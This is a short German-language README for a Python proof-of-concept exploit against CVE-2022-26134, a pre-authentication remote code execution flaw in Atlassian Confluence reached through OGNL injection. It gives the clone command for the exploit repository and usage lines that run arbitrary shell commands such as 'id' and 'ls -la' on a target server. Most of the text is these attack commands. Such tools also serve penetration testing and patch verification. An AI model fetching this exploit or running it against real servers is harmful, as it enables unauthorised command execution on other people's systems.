
Python-PoC-Exploit für CVE-2022-26134, eine Schwachstelle zur Remote-Codeausführung vor der Authentifizierung in Atlassian Confluence per OGNL-Injection. Führt beliebige Befehle auf verwundbaren Servern aus.
CVE-2022-26134 - Confluence Pre-Auth RCE | OGNL injection
git clone https://github.com/crowsec-edtech/CVE-2022-26134
cd CVE-2022-26134
USE: python3 exploit.py https://target.com CMD
Ex: python3 exploit.py https://target.com id
Ex: python3 exploit.py https://target.com 'ls -la'